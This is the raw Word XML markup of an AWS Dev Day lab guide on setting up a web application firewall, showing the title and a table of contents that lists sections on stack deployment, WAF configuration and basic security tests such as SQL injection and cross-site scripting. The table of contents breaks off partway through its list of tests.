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4A52" w14:textId="29A1C391" w:rsidR="00FB3247" w:rsidRPr="00286DC0" w:rsidRDefault="00FB3247">
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56C0B942" wp14:editId="2A2E3E71">
            <wp:extent cx="5943600" cy="2985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5135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD8527D" w14:textId="77777777" w:rsidR="005261C7" w:rsidRPr="00286DC0" w:rsidRDefault="005261C7"/>
    <w:p w14:paraId="4A457A43" w14:textId="77777777" w:rsidR="00B3678C" w:rsidRPr="00286DC0" w:rsidRDefault="00B3678C"/>
    <w:p w14:paraId="26F0F863" w14:textId="4601AE05" w:rsidR="00DC78F5" w:rsidRPr="00286DC0" w:rsidRDefault="005261C7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>AWS Dev Day Lab Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497DD101" w14:textId="1CFBB1BF" w:rsidR="005261C7" w:rsidRPr="00286DC0" w:rsidRDefault="005261C7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EDEA2A2" w14:textId="77777777" w:rsidR="005261C7" w:rsidRPr="00286DC0" w:rsidRDefault="005261C7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6646BD3C" w14:textId="77777777" w:rsidR="005261C7" w:rsidRPr="00286DC0" w:rsidRDefault="005261C7">
      <w:bookmarkStart w:id="0" w:name="_Toc7427109"/>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:bCs/>
          <w:caps/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:id w:val="-74056516"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="538A3596" w14:textId="6AB2BE98" w:rsidR="004C4A1D" w:rsidRPr="00286DC0" w:rsidRDefault="004C4A1D">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r w:rsidRPr="00286DC0">
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2DCE66AB" w14:textId="015D109C" w:rsidR="00E7077D" w:rsidRDefault="004C4A1D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="zh-TW"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00286DC0">
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00286DC0">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00286DC0">
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc76995333" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995333 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="624579DF" w14:textId="72E22440"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34" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>WAF Concepts for the Lab</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995334 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E61525B" w14:textId="19E14F05" w:rsidR="00E7077D" w:rsidRDefault="00BB5126">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="zh-TW"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76995335" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Getting Started</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995335 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16A12795" w14:textId="18DAF9A6"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36" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Download the CloudFormation Template</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995336 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F782D49" w14:textId="62C133BE"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37" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Deploy the Stack</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995337 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="006E1F2B" w14:textId="7FFE9A3A"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38" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Prepare Browser Windows and Tabs</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995338 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BAE5957" w14:textId="72A5C7D8" w:rsidR="00E7077D" w:rsidRDefault="00BB5126">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="zh-TW"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76995339" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Configure the WAF</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995339 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AA6123C" w14:textId="1AB3793A"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0" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Enable Advanced Settings</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995340 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20164C8C" w14:textId="4724C32C"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1" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Create WAF Listening Services</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995341 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1283504C" w14:textId="3145F8FA"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2" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Customize WAF Security Settings</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995342 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52AC1CA2" w14:textId="6FE140CD"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3" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Test Access to Web Applications</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995343 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2FD34AB5" w14:textId="1F25396D" w:rsidR="00E7077D" w:rsidRDefault="00BB5126">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="zh-TW"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76995344" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Basic Application Security Tests</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995344 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57E5C770" w14:textId="0D7A4E54"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5" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Test 1: Tilde in URL Path</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995345 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2520EAAE" w14:textId="62221659"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6" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Test 2: SQL Injection</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995346 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7AD7EAA0" w14:textId="2B78D307"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7" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Test 3: Cross-Site Scripting (XSS)</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995347 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4850FF06" w14:textId="6A7BDF6F"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8" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Test 4: Removing a False Positive</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
